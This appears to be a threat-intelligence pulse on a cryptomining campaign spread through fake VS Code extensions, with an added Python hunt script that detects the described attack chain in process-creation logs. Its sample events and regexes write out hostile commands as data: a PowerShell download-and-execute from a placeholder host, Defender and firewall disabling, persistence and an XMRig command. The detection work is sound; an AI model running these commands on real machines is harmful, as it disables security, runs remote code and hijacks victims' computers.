A cryptomining campaign has been discovered targeting developers through seemingly legitimate VS Code extensions. Ten malicious extensions, published under three different author names, impersonate popular extensions; the most successful fake gained 189K installs, and the combined install count potentially exceeds one million, although the unusually high counts on the top three suggest artificial inflation. The extensions share identical code and communicate with the same C2 server. Once installed, they silently download a PowerShell script that disables Windows security services, establishes persistence, attempts privilege escalation, and installs an XMRig cryptominer. The attack is multi-stage and, to avoid suspicion, also installs the legitimate extension being impersonated so the victim sees the functionality they expected. Author: AlienVault
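As an added example (not code from the pulse, from AlienVault, or from the campaign), the following Python hunt maps the behaviours described above onto the tagged ATT&CK techniques and runs them over process-creation records. The sample paths, hostnames, pool address and regexes are assumptions constructed for the demo, not indicators from the campaign; the rule for T1548.002 in particular covers one common UAC bypass pattern because the pulse does not say which method the script uses.

```python
"""Behavioural hunt for the chain the pulse describes: VS Code spawning
PowerShell that tampers with Defender and the firewall, sets persistence,
and runs XMRig.

Added example for this page; it is not code from the OTX pulse, AlienVault,
or the campaign. SAMPLE_EVENTS are constructed to resemble Sysmon Event ID 1
(process creation) fields and contain no real indicators. The regexes are
generic patterns for the tagged ATT&CK techniques, not signatures taken
from the malicious script.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Rule:
    technique: str
    title: str
    cmd_pattern: re.Pattern
    parent_pattern: Optional[re.Pattern] = None  # optional constraint on ParentImage

    def matches(self, ev: ProcEvent) -> bool:
        if self.parent_pattern and not self.parent_pattern.search(ev.parent_image):
            return False
        return bool(self.cmd_pattern.search(ev.command_line))


RULES = [
    # T1059.001: PowerShell launched directly by VS Code with download or policy-bypass
    # switches. Build tasks also spawn PowerShell from Code.exe, hence the switch filter.
    Rule("T1059.001", "VS Code spawned PowerShell with download/bypass switches",
         re.compile(r"-enc(odedcommand)?\b|-ep\s+bypass|-executionpolicy\s+bypass|"
                    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
         re.compile(r"\\code\.exe$", re.I)),
    # T1562.001: Defender real-time protection disabled or exclusions added.
    Rule("T1562.001", "Defender tampering via *-MpPreference",
         re.compile(r"set-mppreference\b.*-disable\w+|add-mppreference\b.*-exclusion\w+", re.I)),
    # T1562.004: host firewall turned off.
    Rule("T1562.004", "Windows Firewall disabled",
         re.compile(r"netsh\b.*advfirewall\b.*\bstate\s+off|"
                    r"set-netfirewallprofile\b.*-enabled\s+false", re.I)),
    # T1547.001: Run / RunOnce key written by any tool (reg.exe, PowerShell, ...).
    Rule("T1547.001", "Run key persistence",
         re.compile(r"\\currentversion\\run(once)?\b", re.I)),
    # T1543.003: new Windows service.
    Rule("T1543.003", "Service creation",
         re.compile(r"\bsc(\.exe)?\s+create\b|new-service\b", re.I)),
    # T1548.002: the pulse only says escalation was attempted; this pattern is an assumption
    # covering the common fodhelper-style auto-elevate abuse, not the script's actual method.
    Rule("T1548.002", "Auto-elevate UAC bypass artefacts",
         re.compile(r"ms-settings\\shell\\open\\command|fodhelper\.exe", re.I)),
    # XMRig: the stratum pool scheme and donate-level switch are specific to the miner CLI.
    Rule("XMRig", "XMRig command line",
         re.compile(r"xmrig|stratum\+(tcp|ssl)://|--donate-level", re.I)),
]

Hit = Tuple[str, str, str]  # (technique, rule title, offending command line)


def scan(events: List[ProcEvent]) -> List[Hit]:
    """Return every (technique, title, command_line) match across the events."""
    return [(r.technique, r.title, ev.command_line)
            for ev in events for r in RULES if r.matches(ev)]


def techniques_seen(events: List[ProcEvent]) -> List[str]:
    return sorted({t for t, _, _ in scan(events)})


def is_full_chain(events: List[ProcEvent],
                  required=("T1059.001", "T1562.001", "T1547.001", "XMRig")) -> bool:
    """True when the key stages of the described chain all appear on one host."""
    seen = set(techniques_seen(events))
    return all(t in seen for t in required)


# Constructed sample telemetry (assumed paths; example.invalid hosts are not real).
CODE = r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
S32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcEvent(CODE, PS, "powershell.exe -ExecutionPolicy Bypass -w hidden -c \"IEX (New-Object "
                        "Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\""),
    ProcEvent(PS, PS, "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true; "
                      r"Add-MpPreference -ExclusionPath 'C:\ProgramData\svc'"),
    ProcEvent(PS, S32 + r"\netsh.exe", "netsh advfirewall set allprofiles state off"),
    ProcEvent(PS, S32 + r"\reg.exe", r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
                                     r" /v Updater /t REG_SZ /d C:\ProgramData\svc\miner.exe"),
    ProcEvent(PS, S32 + r"\sc.exe", r"sc create WinUpdateSvc binPath= C:\ProgramData\svc\miner.exe start= auto"),
    ProcEvent(S32 + r"\services.exe", r"C:\ProgramData\svc\miner.exe",
              "miner.exe -o stratum+tcp://pool.example.invalid:3333 -u wallet --donate-level 1"),
    # Benign noise: an integrated-terminal build task and an ordinary shell.
    ProcEvent(CODE, PS, "powershell.exe -NoLogo -NoExit -Command \"npm run build\""),
    ProcEvent(r"C:\Windows\explorer.exe", S32 + r"\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for technique, title, cmd in scan(SAMPLE_EVENTS):
        print(f"{technique:10} {title}: {cmd[:70]}")
    print("full chain observed:", is_full_chain(SAMPLE_EVENTS))
```

The parent constraint on the T1059.001 rule is what separates the extension's behaviour from legitimate PowerShell use inside the editor: a build task launched from the integrated terminal also has Code.exe as its parent, so the rule fires only when download or policy-bypass switches are present. In a real deployment, `is_full_chain` would be evaluated per host over a time window rather than over a flat list.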
Related Tags:
T1553.006
T1036.004
T1562.004
T1548.002
XMRig
T1547.001
T1543.003
T1059.001
T1562.001
Associated Indicators: